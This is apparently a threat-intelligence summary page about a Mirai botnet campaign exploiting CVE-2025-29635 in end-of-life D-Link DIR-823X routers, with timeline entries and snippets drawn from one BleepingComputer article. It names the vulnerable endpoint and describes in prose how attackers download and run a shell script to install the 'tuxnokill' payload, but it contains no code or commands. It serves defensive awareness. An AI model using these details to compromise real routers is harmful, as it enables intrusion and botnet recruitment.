Active Mirai botnet recruitment via CVE-2025-29635 in end-of-life D-Link routers
Summary
Hide ▲
Show ▼
A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability in end-of-life D-Link DIR-823X routers, to recruit devices into a botnet. The flaw enables unauthenticated remote code execution (RCE) via a POST request to the /goform/set_prohibiting endpoint, allowing attackers to download and execute a Mirai variant named "tuxnokill" that supports multiple architectures. The campaign was detected by Akamai SIRT in early March 2026, marking the first observed in-the-wild exploitation despite the vulnerability’s public disclosure 13 months prior. The affected firmware versions (240126 and 24082) were end-of-life in November 2024, and no patches are expected from D-Link. The threat actor also exploits vulnerabilities in TP-Link (CVE-2023-1389) and ZTE routers using the same attack pattern, deploying Mirai payloads consistently across targets.
Timeline
-
22.04.2026 23:04 1 articles · 3h ago
First in-the-wild exploitation of CVE-2025-29635 observed in Mirai botnet campaign
Akamai SIRT detected active exploitation of CVE-2025-29635 in early March 2026, marking the first confirmed in-the-wild abuse of the D-Link DIR-823X command-injection flaw. Attackers are using the vulnerability to download and execute a Mirai-based malware variant, "tuxnokill," which supports multiple architectures and includes standard DDoS capabilities. The threat actor also exploits vulnerabilities in TP-Link and ZTE routers using the same pattern to deploy Mirai payloads.
Show sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
Information Snippets
-
CVE-2025-29635 is a high-severity command-injection flaw in D-Link DIR-823X routers (firmware versions 240126 and 24082) enabling arbitrary RCE via a POST request to /goform/set_prohibiting.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
-
The Mirai-based malware variant "tuxnokill" supports multiple architectures and includes standard DDoS capabilities such as TCP SYN/ACK/STOMP, UDP floods, and HTTP null attacks.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
-
The campaign was first detected by Akamai SIRT in early March 2026, representing the first confirmed in-the-wild exploitation of CVE-2025-29635 despite public disclosure 13 months prior.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
-
Attackers leverage the exploit to change directories on writable paths, download a shell script (dlink.sh) from an external IP, and execute it to install the Mirai payload.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
-
The threat actor also exploits CVE-2023-1389 in TP-Link routers and an RCE flaw in ZTE ZXV10 H108L routers, using consistent attack patterns to deploy Mirai payloads.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04
-
D-Link DIR-823X routers reached end-of-life (EoL) in November 2024, and no patches are expected for CVE-2025-29635 from the vendor.
First reported: 22.04.2026 23:041 source, 1 articleShow sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routers — www.bleepingcomputer.com — 22.04.2026 23:04